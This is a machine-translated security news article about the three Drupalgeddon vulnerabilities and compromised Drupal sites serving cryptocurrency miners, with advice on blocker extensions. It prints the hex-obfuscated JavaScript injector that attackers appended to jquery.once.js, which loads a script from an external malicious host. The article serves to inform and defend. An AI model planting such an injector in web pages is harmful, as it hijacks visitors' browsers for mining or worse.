Drupalgeddon effects: Non-updated websites are minning the cryptocurrency
Drupalgeddon1, Drupalgeddon2 i Drupalgeddon3
Behind the Drupalgeddon's drupal apocalypse lies the seriousness of the threat that describes the trivial code execution on the server or the takeover of the website. These are high-risk incidents because the attack can be performed on many instances of Drupal.
The first Drupalgeddon (CVE-2014-3704 gap) occurred in 2014 and according to the risk calculator used by the Drupal Security Team, it received a maximum score of 25/25 points on the scale of the seriousness of the threat. Then the problem concerned sending an anonymous user (without special rights) a crafted request causing execution of any SQL code. Depending on the command, this could have resulted in eg escalation of permissions or execution of PHP code.
We were waiting for the second Drupalgeddon for 4 years until 28 March 2018. The quick-release update corrected the CVE-2018-7600 vulnerability, which allowed the attacker to run arbitrary code on the server without special permissions - the attacker in the default installation did not need to authenticate. The vulnerability was determined by Drupal's team to be highly critical with a scale of 24/25 points. It's worth adding that the pages hidden behind the CloudFlare DNS were secure.
The third Drupalgeddon came on April 25, 2018. CVE-2018-7602 susceptibility was already much more difficult to use because it required authentication. This did not prevent the attackers who use the published example exploit (also available in the Exploit Database) to make attacks - as it is called - in the wild.
The mentioned page with the exploit database contains ready sets of commands for remote execution of the code on non-updated pages powered by Drupal. The attack is very easy to carry out. Details are available on GitHub.
There is nothing to wait for. The update is absolutely necessary.
Drupalgeddon's victims in Poland and in the world
Troy Mursch published statistics that he managed to collect so far. Among the compromised 384 pages, most are in the US, France and Canada. On this list, we can see two TLD .PL domains belonging to Polish companies (szybka.pl and vaks.pl), with whom we have contacted and warned the owners. Although the file only points to two companies from Poland, it does not mean that the researcher has managed to reach all websites in the world powered by Drupal. It is difficult to estimate the scale, but there is certainly more to the infected Polish.
The attached code to the page can be recognized by the file "/misc/jquery.once.js?v=1.2", which at the end contains an encrypted script reference on the page hxxp: //vuuwd.com/t.js <- this is not anymore is encrypted:
var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64');var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);
Content of hxxp://vuuwd.com/t.js:
Among the victims there are American and Turkish government websites, universities, the Lenovo website, two pages with a .pl tip and many more.
Non-updated websites are dangerous for Internet users
It is not possible to manually verify the security of every website you visit on the web. To readers, we recommend installing the uBlock Origin ad blocker, which contains built-in black lists of cryptocurrency excavators. This should be enough to block scripts that use processor power. For people who do not want or do not use the uBlock Origin advertising blocker, we recommend the NoCoin plugin for Firefox, Opera and Chrome.
Internet users who already have anti-viruses installed, but not necessarily with browser-based protection, should install the Bitdefender TrafficLight or Avira Browser Safe web scanner.
Add new comment
Learn more about our offer
We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.